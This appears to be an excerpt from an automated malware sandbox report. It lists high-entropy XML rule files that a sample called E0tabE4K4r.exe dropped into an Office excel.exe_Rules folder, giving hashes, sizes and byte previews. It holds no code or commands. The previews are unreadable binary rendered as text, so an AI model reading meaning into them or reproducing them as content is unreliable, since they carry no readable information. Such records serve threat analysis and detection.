                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):752
                                                                                                                                                  Entropy (8bit):7.7328791262670435
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:0SVPn/z+FQj4wRnPi7YEgeR4QAcSWkLrmPXoHYfYQrn2x+ayd/Oq2ZwighdeclTS:06v/z+FQj4wR6UEgHcSWjPXoYrkyd/Of
                                                                                                                                                  MD5:873965EC43D0265108B2296A337B2109
                                                                                                                                                  SHA1:3E308EE8E417A03CF204E8B8BACCB9FACF845319
                                                                                                                                                  SHA-256:A4864A6614C584F8E4D668E6A206DC259C6A00C02C4DB4F99D2E41D74FE72D7F
                                                                                                                                                  SHA-512:59E1A90F22E8CF4CBAB0F4EEFFFFF8843612CC2E4B63830E164533D0FE8F8DBAFCAD1E4B3B84599F559E7C0C9CD38B54B62329FB8496BAF753E45B91F3C2BBD4
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.......r3Yo.......-@.E.!. ...l..n...KP....j62..Ho...........p!.z.....[.*..tZN.GF..}..X..=*..#n.D.S.../...I4..!...5...I.S=...B.k..'......D....&.........C....]..._......9B..J..?.....C!...f.a..r...+....v..I...+..N..a..6..x..&...Bd.:..7_..t....../...<O.?.B.....'..#..W..a...of#4.9.$|.D.'.z..=\\.P......J...x.&.cl.4.~.-N.....b.#.U....p,.mXA.Sn....5...7JH.e..pdg.&.!.l...a.~..^.....b...N~.9.vv.3.;.[.A.y..MdEP.."n .:..g.w..7..C...S.d.?..J..REj..../H..v.8......v..$.{Z..d.$Ca....%9EY..WM...}.9g0wHp....6.C0.......G....~p.q..9..8...UW...O).9....D.3|._._u..@..m..nc..V...=K8uK.W...@.hiYw,...T.m.d..z..L..:7k.A..q.F.q~U....'.8x..'.\...g...IEC:{..mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120626v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):805
                                                                                                                                                  Entropy (8bit):7.744129702692437
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:7s6fBJFwSKDfcYeAp/LWnB85VEDTcw3ef2bD:7s2dw7fcYeAp/Cn64cwND
                                                                                                                                                  MD5:FEECCDB8D5157F0D3A99471D53EE8A4D
                                                                                                                                                  SHA1:0F27CC295900BD95830343EA3EAC0DEA68903C5E
                                                                                                                                                  SHA-256:8E7B0363742C5BDE983354091E0D9ED6FE3F239D432003E468D32B6DE9731537
                                                                                                                                                  SHA-512:5648B00E80C2949973B6EB0D5506C73A620900FF8F158457216CC2DAB50B3D7ACBC381BE221BF2E191BB16C664B45AABB8F2100F3028B04904D0F7317CBEA838
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml............Ar..Es...(..7q....~.y5..G.'9.:O...X..{..".i.IZ.UI..p[....p.1....;.'.;.bZP:.wx.....!..f......Q.h.X.N.L./..).......#...{B....=...b...&a.....L1Xvsx..=.v..1.....G.G.=/.........4t.)..E..F.9....j...'...$AF...Sm.jk..c@.;...>..C..P..............h.z....P..=..2K ,*.....G........U...J..j.>.v...&5.w,.,.+._-...^..6=q|L6...%Z:.,.....F6w..V.M...*..5y...K....\.R.fv..H...8?.....h.o!.Sy...*k..Wur.d.<92...~........6"T<...*X.X.e.z..zw.{..>^.....}K,....Y:f..*..Y..>H<'..gt..c.j....r......u.."..)..:l..K...$I7/Z".V...x...^K...(.VU.rg>b.07[(L.Q.....`.EzQ..#......F}.P.....6...{....O!n,......lyK1qYFHK.3.....KZTB.....\...^.M.o.4zi....XbQ.....<..........)....6Z.....R.d_..f...O.....X...P.....EmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120627v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):737
                                                                                                                                                  Entropy (8bit):7.671746720584697
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:hlVa0/8DGWKkdMmEa2eNr7rAECDsgmbh2M2uZEUiJrOZuroT4IR/H5MmGIkj2aSw:hllzk8reFWwNtRcUpIsT/xUj2Z2bD
                                                                                                                                                  MD5:7E781C4801204E29060E68E7B6EC1CDC
                                                                                                                                                  SHA1:900FEA3D76031501D3DDDEDD493E4283EA9EB3F3
                                                                                                                                                  SHA-256:A80D1DE5F19CD3E3576B9526D07E36A1D25B2A6D0940E6DB7F5DC4C3E2716740
                                                                                                                                                  SHA-512:0131647EA73E56BA642CEC8136CEAC3A15F9D6FC72E12A342A1B2686340746F5717DE0C02D77C9926FE44D08029661FAFDB159C487022ED51DF39338F09DAFE1
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.M8S.JQ$.T>Op.R..?.Qf......WI....!.A...V...[C.9?...;jG.T.....=.N.)..x......w..d..r...(....f.........Hr...Wss...tr....wMW._L.>/>.H..XWF?..3Id.e...eu\03....`X?..X.......'r./.8.Be.1..}J....57@A".~.=c.(.......G*..E-.6........m.D.'..(z...?.-.:.^?W.4....D`."..r7.V./.v>..<....v..8....;.Z..;.s.V...Ovii.T0...bp..........K.g...zf..8\K...8.F..C}m6.6;....0&..pI3.5.h.....2.N+...`.....$.tA.......x....].......4i.....p.7%.cZa.}.K..P.5........{..a}j...mO..p.d..n0.O&Z...v.v..m.O......,.9=...S.Ms.h9.xD.dk].~..V..X..&.pj.(.....!...)[..R.g~.....G.@t+.DBb..7.N.b.t.9.t...N....=.".^KG\...\...<.T.:.`_..q,G...$BNW.D...z...w.....5..EmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120628v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):801
                                                                                                                                                  Entropy (8bit):7.714807630965728
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:IowZxyUiIFL9ntiPYDV7CosiYjDlZNvy1nV2bD:RghtiP+YJjjA1nuD
                                                                                                                                                  MD5:393ED80BD1490592232337564216C98B
                                                                                                                                                  SHA1:9B0F96691D2FFA423CEBA4D97B8924FDA83908F4
                                                                                                                                                  SHA-256:9D87316CC6CE11E8D3864EA655F1BF172D48EA26DC8BA1ADB7F39A91510FC4D2
                                                                                                                                                  SHA-512:CC90A84494AECAD0D8AB2A67FEA8ACCC57F944E4D5A89053E672EB14FB63CC51331B490C08C716E3128731576E0A61FE082FAF7D2E93DCB420ABD50E93AE841C
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlu.U.~..=L....C..s..*x..v.Jb1.? .XJ.......>#....e...\...0...K....t.(..u~..Q.........4....G...[.br...X<...|-.I..t.].{t.>..evA.?G9.0..I..<...6.4...a^.....3...o...3...;U..{..^qPl..!m.Y..N.o..Wx...w.. .b.....N..J..1{8.PX..7..............@9..03........4w?d...T....fl2..mT+..8N...8.D.......}[BZ...-L........../........A.n.Eq..-.-..)..............<.n.Xl..;R .K..YU.j.@sF......R.....xR.....0Q....>..^!T....SU..n`.*.=[h..Z0EC:y....p.X.h...f.Y..B<..|F.4....o..Z.0.?F..I.&q.....U.K.i....._f...w.rO..>}.c'.T.......Q.`K.W...a..4j..3..z=2....`V.pl\.(t[.J....,..N..F.4f.1-.Co.~.n.-4)....."X.@.f2..Y...A....r..)...7.^7 .Z....m.Q.....YK.m.....t,..WK..J.......L.._.s(("..jr.xn.j..C)...k6K......mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120629v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):761
                                                                                                                                                  Entropy (8bit):7.693296413225508
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:fwzgPRJpjK0vAOaKn3ly+dkIgsPmvSprGw7Ib1MmILegtWtW6F2vrVol7jCAHIXD:fQKRJtjv4Kn3l9SvsJ4w7IZMPLztkW6s
                                                                                                                                                  MD5:72C409DDBCF28B4F00B82A70EA05F072
                                                                                                                                                  SHA1:7DD41037CB09BBDAB81B6D8DD3A450624887D8C1
                                                                                                                                                  SHA-256:FAEBAC493FE348AA5E0600CD803B16E190E2E675B35DFA83B078FD7396A82AB6
                                                                                                                                                  SHA-512:77A793828F34332DB87DABC2A73559A0A2175EC988BBEB354E9B8AA13B94580057F2C824B513403AE7EBDCCB6498697BBB6BB9F8862CDFFE692749FF0EEF2E7F
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.O......d......vK.f%..T...$.4x....6.M...D(..5.......S8..dP"...s..%..3..I.....*P.Y...l...$+...0eB.a.]....R.S.>....$x*L.[.`9.....&\...T..7.....R...QD.;#...(.....l..m..5...J.....7....7Fh.(......u.).....ac...U..T4.Y..B].....my.....5c.DP..[.I....:qo...O.ZX(...$vY...Q%.q...~.H......FX..$...]0..(.......N.`.t.`.<...g....<.........>q.....)..xzE...G...(Z=e..X..)...Y....%K......Os...\......Z...<.t0.7.;..p.Q./S.Y..3.....n...;....%..{A0m..\...t<.A.v.W...K../...I..C_E..6......59..'7.?%.c..to..v|......i6.3.X;.+.1.6.|.>p~c.2wpO.bg..1OT...m.~.O.....o.Hd....p..Cjv.c...9......w..........M....g@}*5h../k...p........-.......v#.bG.6.g..b.F...dGm]...g,.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120630v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):832
                                                                                                                                                  Entropy (8bit):7.764341911319881
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:WLR+uX+9TehwP/6U2nBbSsEbCCG92Um+CtV2bD:WJmywP/6U2Bbs7ezm+8uD
                                                                                                                                                  MD5:D4D2640F8B047A3DA5EBDED50E0DAB2E
                                                                                                                                                  SHA1:C10D974F97A2B30D62B4AE71F1B42B088FD9BA72
                                                                                                                                                  SHA-256:B4CE21AB064CCF6839CCB92EEDD9F5F44FE451C6E010D99B13061E380C4A8D1E
                                                                                                                                                  SHA-512:8AF0A50B83EE2B1D4AF5302EB31454700B4E2F8F35BF5F8D906FEA1DC8BC2BA4AF7EDADFD6D2B733745749386C464639F64B6E93C539C5B658C60EE6835D6070
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.6.N....t."w...]h{.........s.5.K`.........i1..'x..E1i.....zO.B.....,1.V........J>S..8U.W.Y..@../p.{.1B,K.. ....{5.....v.(.0y...x.h......t..].=.i 1.8.y....%Q..n..U..h..DU.T..2...h=.J.$..c..,.sb.....#.D.7.,D,r1..E........)K.r.2....H..k.'....!F...k..SsY.,-Td...M].....7.I.D......4%4..I..Z"..f`.......U....B.L..<L...O....o.>V.........~...m._b..y..h....%...P.4./......*0....9...../.P...c)09.^.[.>....J..4..\...^..##.o...&.......i%.X.Dc.....I3t.s...KS..dR'.R.Dt..y5......L.lI..R.A..YxV+.\.2T.|.?....R&Opi..<tU$...k..=.....:..@T....S.9.F3.L.G......n.P..f-,..$..\........+..wT...),&..<:X.........7.s.p....R.O...#..Wq.$...2/..1W.....V*.....w...i..l.U8...../..Nsp.......,.a"...M.{.eW.....}..d/..}....t.`.....>mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120631v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):748
                                                                                                                                                  Entropy (8bit):7.690211965085992
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:xI3EuFJ7dpr87th4MGF2glHYqE7ZdIRpP1tt+RVNqiOYKAVUmgmPBd3psSUdNciD:x36r187th4d2CY/tSRp9tsRvqZYKAfF6
                                                                                                                                                  MD5:430BAD1840766F5089177BAF4E767840
                                                                                                                                                  SHA1:7DA97B1210FCDD9A3741AEEADDB8A655C03B7D86
                                                                                                                                                  SHA-256:6D7C8FD816B7D23B2AEAD19D0737CD3742AD59E7B19B37F893E0681A4F573D7C
                                                                                                                                                  SHA-512:E33840A54F221DF33D91DB2B368D23219428E70E02DC2532F0B91F4DC044CCC5F3CED0378CD68184D8E57F0506F6B6D78BD43FB2DEF952A7528506504301AF06
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.#...$k= .h-7.../C........H....gUi....\..=.4..*.B.....x.I.)]5_.1..J3..n}5...`.nz.^U.E9...t...?.9.7..a..m..g.. .kI0aX..]..t....k..&Rl...x<.Y..=.n.#~.JN...l.....P..1`'.n...@<...h.8s..~B..s.....m.'.U..j........$\.......o..J..}}..#......\.)...Z..Dv.......X..G#...F..j...'._f@HpL.z.q.....O......5X....R:.....?mi.^.eai...j......s.*..].....J.@..Y...Wj......o.U.H&....-.L6...g.^1+.H.KQkk....*Z5...7..%*A.7..-.}Z.oa8U.b.Djj$....L....J......O.*....o"........;m......S...........O..........R..?C.cs.T&..$..P..w......K.rUW=.$.....-...*$9D0.8..r.{|d.....8v...W......r~.*......B.|..Z0......6....x..B...T.M...}4..4..,.`}A..j.......w....#.k...i =y?.c.+.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120632v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):804
                                                                                                                                                  Entropy (8bit):7.7742248366101325
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:278gKFo/X/WRYlfK4d7uCaTsIel3wG2bD:s1KFo/biM7u3szhwND
                                                                                                                                                  MD5:AAE9C29FF07F4567D6D1CC84C8C35448
                                                                                                                                                  SHA1:CFFE04C0166E9E36A87CAE0A8F2E7675EA147833
                                                                                                                                                  SHA-256:C43D154883A0E6783FFDC01E4C145EE25BD7AEF7C9D2E8F828D63716438E3A04
                                                                                                                                                  SHA-512:41BEF408381F7D3C72886E0795A8E072D58C43BA2E4A55F237F23555BC79708A15E0CE1D8F9BAE0891A958CCB06A85B58C51C9264CD7F302A5EDCB1DC66FB406
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml...c..h...p...K.......c....6.fY......bC...bc....0m,..6..."<.=;.~e*.IH..d..@6.}..U..Y$....|....W*:s..........|$..!..&8....ge..x.FN..S.z..g....`.......c..Gt.2Y..H-.,3...v....@g.Yz..J..b.......T{E.hT+e$X....b.p.+X.. ...u.;.....9.m....E..BC..y...Ex..E...~@.e..c.*]d_'.A.$.A..D4.:.1...(b..+}..w...\.....T..&.'.z7.cpW.V.....Y.s....@...(iU. ...[.=...M_..._S.!..Fe.D...B.9~..`C..Q......C...0.......u...HXk.'... .;...7...L....Z..zs<..1.a.;.G...._`...8m./.R.mx-..x]9w.....'..#...v.Q...9.O.m;"......V...q.......'.d..*...].....).......^.8.kp8...^..3....q..~.4:...2k..:.*.P.z...4O.......$M...V{...:..G.H...Z...\.PB......r.3zK....N*...r...U]O....u..h.7...6&f.3}.l.i...JR...W4.=..y.......1{......Cn.ymMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120633v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):752
                                                                                                                                                  Entropy (8bit):7.720387975443512
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:ezaJ3NY70WCr99ywaY2QbjapYQqOn1kJWT6LtKYnjMf+LTPmDpPECMqDrKOjbSUn:k89Y79MZbeFbkJxhRPTIpPD93bS2bD
                                                                                                                                                  MD5:BD396CEBD2E177AEF8F7D63A8768DB6E
                                                                                                                                                  SHA1:C74C8B4A87CEB822519EF441CD7188F47B0F4315
                                                                                                                                                  SHA-256:3BE1350D9A803056FF04EE63252B823D299CC82FC0A4F60D5C9D8CD486C3A58A
                                                                                                                                                  SHA-512:F90236BB81B948D0868E1FEDF237DE0829E07EAA20E0E51C50178D44F231A0F2AA1AE62DF8A54D9E61F341FC28DCAE8BCA45CA0680F4C6AA907D1BF9DFBD3E03
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml...u.......d.s.'.+.......8h..-5FD.%C.....?'....G.!S..xB0g.TP.\..fj(....S....8.b).F..y1z>m..*....+.f...g...|.$W&..w.B....t!H...Yy.......0.........._.;Op...F@...!...s.....l.e........ .."..p........W..........^...?..dU....c.....[x....v......T....MQ".C.t.RLU...v.d.....#....^O..q...d..i...T;......*t....Jq................R...s....H...=...3p.m.mLI..;......A...t...r-.fH.c .....+".....L.l.*......gj.M./4........+.[...j..%.u..|..j...D..[2.q.$...V;.b!..U.u...?..X....'.#..w.. N.*..i...).+....n..".."\.CV.v_.....O.q.0 4..G...K.@+.....}'.T....f..q...}..{f5=rs.?.A."D...)a_....+.J.....'+.(.H'..T._...]..?Y......|....x....9.$8)[y.&A....6|/>.G....X...!mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120634v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):827
                                                                                                                                                  Entropy (8bit):7.699638165114875
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:Sv02ciC8MEt938x6CiFmVwawmyicrtq9fSwdUKlBm1KIyJvDYIkFSUdNcii9a:SLXZvP3I6VFm+yT9ftdUCB0kvDCo2bD
                                                                                                                                                  MD5:35036E14259EB100F7E9D9A285DF5E44
                                                                                                                                                  SHA1:71661D8431D5053221F067DA0DC28F627A60EC11
                                                                                                                                                  SHA-256:67401F2902975651635E99D989501A3E6BD918DA6578C7C34B49D55964982F7F
                                                                                                                                                  SHA-512:5FCC1E6A7EF9A57810D6E0EF84A3AFDFAA9F7301CA36C6581A0D7518C6BD2B063A16C768D3D2B40785D1B68398F6EFADABB2B7B866C14FEF8568EA8BE2F3018F
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.e...{.*R.{..S.Xt...?h+.+...^.C..j....c..{Kfn,.n.G.(....2d)?8....=..|...D^"<..,hMMV...|..h.H.\.TO.....4.A........U9..r.VB.R.S..}...VC.+.7s...3.@... .Z.d..OB.h..{...[.X~.,vs.*{cR.X...n...7..via9...1sm[w.....'5..2.`f.pXr..@..I.^.71<.ct..[.z.@..j..Af..>...*.....oa... `....;...c...y^....)Y=...C...n.b.....Q.Q.(...@ .h1z....>N,P.5.P.4.V.F..W.C..cQ...9l.8Y..!4..)....!..a...ZI.b.....lVd`N.|g..emgD....8. b.DQ'...=.'RcK...,.t...B._......%..7.h..m[.E...M.Z..6.F........c..FzvL7v.k..D..`...a.9QM...V.9K..............-......X.nx...+.j4.O..hz.d....<.......h6X..t..Z....M!..K.<..On.....%u.[..*...y.F.`..7....oe......(..8.VMb...8D......i...KDC.\...j.d.i.d.LXh...F..[tn...e.4.ND.L.\,.~...T....K\.R.lot;T...Z...0tO!.m..W..fG.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120635v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):753
                                                                                                                                                  Entropy (8bit):7.665457229213307
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:K9IPYqhOp49JbeFQcPVx6qMVTtDQbR7ckEEIuoHgQqeT25NN4L8lslPYSsK3fLoh:oqhOp+JbKsTtDOakp225NNTOlxsK3fRw
                                                                                                                                                  MD5:C2971C7972ACBCEF9066BEEC07BEFF62
                                                                                                                                                  SHA1:9649ABC9C662C60181170FF0D2D22EE3AD62B82A
                                                                                                                                                  SHA-256:20C8C919E268FEC972772CC60BD90B1D33E3B8192D0A9FA5E5299D3C953EF1F2
                                                                                                                                                  SHA-512:21BCBB0742CC18CAF34385E8BFC1680C2E202A394AD2F6E4CA1DBB64C1EAE729A76420ED764B23F0D83178F6BE0CB5709970CBA2AEC0BF543E05FA11BB4EF8F4
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlK.l...;.Eh.Hus#.?.n...o.KP.Y...{pt&>..A.3...V0...e.+D.1..R...)....I.DZ...L.dV9.*.mCM.......XGa......l.j.u.o...Iv-...E8....k._i......tp^.D.[.....I...f...T-.5^..r..f...)R...Q..P.......q.'.....p.Ew1U:....FU&.u .t...Z......4j....7...................t...Ph.B..p.awZ...&2G.V..x.[.Q~.).L'.^^...&..}.!....r...~.....D..%.AP:.M...........-`.H'9..b...R...N7..+X..S#.8....~5.r[l...yB0.&...M...V...."....c.{N..........M.....f...B..I.h<,.....G..+...F..!z....W.f..e.~......v.....M.EQ.%Z.@.qr.H...q..gkx.9'.....zE....*.,...W5W...:....jk.@...lLc.........#h..;..OX.W..Xy.U`.......R.u..27z.w.y.!P[Wr......e.i.z..g..NH ..9.[@c.9>..z..K....U..mU.0......t?.JeN7*vmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120636v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):805
                                                                                                                                                  Entropy (8bit):7.700851078810228
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:ESmN+kLoMgcA9BjurlHSKctR6uj72uMOw2bD:ESmQkLoMgxRBKctRbv2uMOjD
                                                                                                                                                  MD5:E74CA15AE4B21872A01440D90CB3F816
                                                                                                                                                  SHA1:1C348FC3FC1494AC9032A39DE226C6789B7C6FE4
                                                                                                                                                  SHA-256:04A66ED88AA034BC423A3908879F169454F508C9FEDA40534EB360E2D01FE0DE
                                                                                                                                                  SHA-512:8C1CB52A38C0DE03EADF1EBD59AFB79954267FDE1435AF91AF7499D6FB1E35DB6DC410733F9FAB1BBF5229B62DC28B32363DF6E8A9680B56863F601C03354170
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.4j..*.f..&X.\(.UT.e.....Cg. ..iPI?...V......|]g.....].....Frm..h^.....&... ....B.y`.6..7.HG./"M#.Z.{...gx8Au...y%A.T..;R...8..s1.$..%.G&.y.,$wS.By.8lBj..V..|.y..!....).x5......Ll...k...r0q#.B.2..Xj0#.W...-....B.O....uz..R.N.).....6QI.q.g..b..&..N7.n..{6h....H..XC..eM.0...MW...-..`.5.............9.X....Ka....4.Bb....g.s_.n...da$N].a..b{A.J7t..?%.".w.......w|...`...a.b....3(.>r`jL........SQ$..n...H.R..Z.,T....+.....e.W..U8....=....&.....k.<.D,G.X.$.u.*W.T....@.L....@e.}.........|^_..=.._...'.;K*...kY\.=..t.?+w.1\TV.........F.xH.....52..&i.....%.."..5.I..l...YO.+....I..6.`Nk......t.bZL.De...!.{^j..3. ...@...a.6}u[d...q.H{..0.......II..!...:..3...5Ww.R..........I....`..n4.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120637v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):760
                                                                                                                                                  Entropy (8bit):7.700231418840532
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:z9dHh6P/oKuiKGncz8bXFIT91Ad5LpX8Z8ghgd/bJ5WM7sZVmSG54o5fw83sFaFB:zPsV1ncopITHALLpX8ygKd/t52Y54o59
                                                                                                                                                  MD5:36333BF22AA4B497F1D76B4469EEE5F0
                                                                                                                                                  SHA1:2CAD4258C45E6CB72F38296CFB87EB83A94AE2A5
                                                                                                                                                  SHA-256:A910A88BE31BA42FCA3B1B37B64AB052D377822C91453F4C4C0CA53D2836CD7A
                                                                                                                                                  SHA-512:BFD77B2BCAC53FBF7420D432FAA9E605DDEFA18FFC6A12B140D8A61D477449B38F1398BCA17CF1A247A0032FB86FF06B379E72216B090B0C11712234947AC777
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.*L/z.(....p.B+1....^...Ua~..H..A....3..~l..... g..d......&.0DF/\!...G....pw...3d..{}....s|...7.....mi..n.4.....9... v,\..C.7\......n...K..MQ.M8.....bf..n..I......T_M......A..u.`..}%..{RZ9.-....p1......i&.z*..R..'...q.7.I.q.$.x..$..f...].+...!o.(G..u...:.N..x....<~..i-...7.."..5.[..~.(..jG.....-.DY.1.l...?...`}..G.m..u!....3n..`.gp.I.9..S.WoX@.%..5$...J...G.|W....T.~..O.5....r.hZ.."_DIX...{Y..@.....p0..!.6?Ye..<..)...+m.Z.&.......vvj..6^..h....A{KV...\..G.N.....^..M.*S.....t>...9.k~..^.....yn..;_=..YmS/jM.......F..y~.[.(...$G.!..{<le4...*([e.....w.........=.h...k..SJ....K.H ~.p..S@..G]....03.i.....D&v....o.).wk..o{..<.h.Hl/.%.u...L....b_mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120638v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):819
                                                                                                                                                  Entropy (8bit):7.701003782212354
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:l6XBPnTnqFEvE4MMTYV5/zQGA5JHYW2bD:AXBv7qFSE4N0IJHYdD
                                                                                                                                                  MD5:2D8A4AA89C37A0AC3B97840C813E87B7
                                                                                                                                                  SHA1:D3991B01530FF74399C5A63AF30199C7BE834F65
                                                                                                                                                  SHA-256:D4BD7E4F3C7958FDC56C7C811E30932B4C76C46AAEC9FE4ABEA0E1F227A15F2C
                                                                                                                                                  SHA-512:DAF67D511F2EA18AD45D74D58F5E4792C12D4A116AB21DDBCE7BE7E971C9D0408CAC2DEA6C7341833BFE9CE7825C851F059B05A7FCCDC97BE04C23FD29BE6690
                                                                                                                                                  Malicious:false
